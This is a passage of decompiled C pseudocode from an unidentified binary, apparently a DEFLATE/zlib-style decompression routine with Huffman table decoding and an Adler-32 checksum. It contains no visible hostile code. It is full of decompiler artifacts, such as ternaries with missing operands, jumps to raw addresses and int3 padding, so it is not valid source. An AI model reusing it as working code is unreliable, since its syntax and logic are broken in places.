																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x301388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x301349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x3012e3;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x30131f;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x30130b;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x30149d;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x3014c6;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
											__eflags = _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x301372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x3013d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x301401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x301417;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
												_t618 =  *((short*)(_t1030 + 0x24a0 + ((_t804 & 0x00000001) +  *(_t1065 - 0x28)) * 2));
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t618;
											} while (__eflags < 0);
										} else {
											L198:
											_t911 = _t802 >> 9;
											_t618 = _t802 & 0x000001ff;
											 *(_t1065 - 0x28) = _t618;
										}
										L202:
										_t1004 = _t1004 >> _t911;
										_t1050 = _t1064 - _t911;
										 *(_t1065 - 4) = _t1004;
										 *(_t1065 - 0x1c) = _t1050;
										if(_t618 >= 0x10) {
											L204:
											if(__eflags != 0) {
												L207:
												_t912 =  *((char*)(_t618 + 0x120ff0));
												 *(_t1065 - 0x38) = _t912;
												__eflags = _t1050 - _t912;
												if(_t1050 >= _t912) {
													L211:
													_t1050 = _t1050 - _t912;
													 *(_t1065 - 0x1c) = _t1050;
													_t913 =  *(_t1065 - 0x14);
													_t1046 = ((0x00000001 << _t912) - 0x00000001 & _t1004) +  *((char*)(_t618 + 0x120ff8));
													__eflags =  *(_t1065 - 0x28) - 0x10;
													_t808 =  *(_t1065 - 8);
													 *(_t1065 - 4) = _t1004 >> _t912;
													if(__eflags != 0) {
														_t1007 = 0;
														__eflags = 0;
													} else {
														_t1007 =  *(_t808 + _t913 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t808 + _t913 + 0x2924, _t1007, _t1046);
													_t1068 = _t1068 + 0xc;
													_t911 =  *(_t1065 - 8) + _t1046;
													_t1030 =  *(_t1065 - 0x14);
													L178:
													_t1004 =  *(_t1065 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															break;
														}
														L209:
														_t618 = ( *_t847 & 0x000000ff) << _t1050;
														_t847 = _t847 + 1;
														_t912 =  *(_t1065 - 0x38);
														_t1004 = _t1004 | _t618;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 0x18) = _t847;
														 *(_t1065 - 4) = _t1004;
														__eflags = _t1050 - _t912;
														if(_t1050 < _t912) {
															continue;
														} else {
															L210:
															_t618 =  *(_t1065 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1030 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t812 =  *(_t1065 - 8);
												__eflags = _t812;
												if(_t812 == 0) {
													L268:
													_t689 = _t812 | 0xffffffff;
													 *_t1030 = 0x11;
													goto L291;
												} else {
													L206:
													_t618 =  *(_t1065 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t917 =  *(_t1065 - 8);
